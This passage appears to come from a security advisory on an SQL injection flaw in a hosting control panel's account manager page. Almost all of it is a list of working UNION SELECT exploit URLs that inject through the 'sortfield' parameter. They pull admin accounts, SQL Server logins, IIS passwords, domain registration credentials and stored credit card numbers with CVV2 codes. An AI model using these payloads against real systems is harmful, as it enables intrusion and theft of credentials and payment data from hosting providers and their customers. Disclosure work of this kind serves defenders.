5- [User] can see all the database information by a SQL injection.
 5.1- Some exploits are:
        ~~~~~~~~~~~~~~~~5.1.1 Exploits~~~~~~~~~~~~~~~~~~~~~~~~
            ---See all users
            http://[HC URL]/accounts/accountmanager.asp?iconwebsite=&search=1&sortaction=1&sortfield=name union select Name,FullName,Description,AdminLevel From Admin_List where 1=1 order by name
            ---AdminProp
            http://[HC URL]/accounts/accountmanager.asp?iconwebsite=&search=1&sortaction=1&sortfield=name union select propname,adminname,propvalue,propname From Adminprop where 1=1 order by name
            ---SQL SERVER
            http://[HC URL]/accounts/accountmanager.asp?iconwebsite=&search=1&sortaction=1&sortfield=name union select Databasename,Owner,Loginname,Servername From SQLServer where 1=1 order by name
            ---IISPasswords
            http://[HC URL]/accounts/accountmanager.asp?iconwebsite=&search=1&sortaction=1&sortfield=name union select FolderID,WebsiteID,User,Folder From IISPasswords where 1=1 order by name
            ---CreditCards
            http://[HC URL]/accounts/accountmanager.asp?iconwebsite=&search=1&sortaction=1&sortfield=name union select creditcardno,expdate,isEncrypted,cvv2 From creditcard where 1=1 order by name
            ---DSN
            http://[HC URL]/accounts/accountmanager.asp?iconwebsite=&search=1&sortaction=1&sortfield=name union select DSNName,DSNOwner,FilePath,Driver From DSN where 1=1 order by name
            ---Domain Registration
            http://[HC URL]/accounts/accountmanager.asp?iconwebsite=&search=1&sortaction=1&sortfield=name union select domainname,domainpassword,ns1,ns1_IP From DomainRegistration where 1=1 order by name
            ---Domai nRegistration Info
            http://[HC URL]/accounts/accountmanager.asp?iconwebsite=&search=1&sortaction=1&sortfield=name union select custname,accountlogin,accountpass,authoritytype From DomainRegistrationInfo where 1=1 order by name
            ---GateWays
            http://[HC URL]/accounts/accountmanager.asp?iconwebsite=&search=1&sortaction=1&sortfield=name union select creditcardno,CVV2,Amount,expdate From GateWays where 1=1 order by name
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~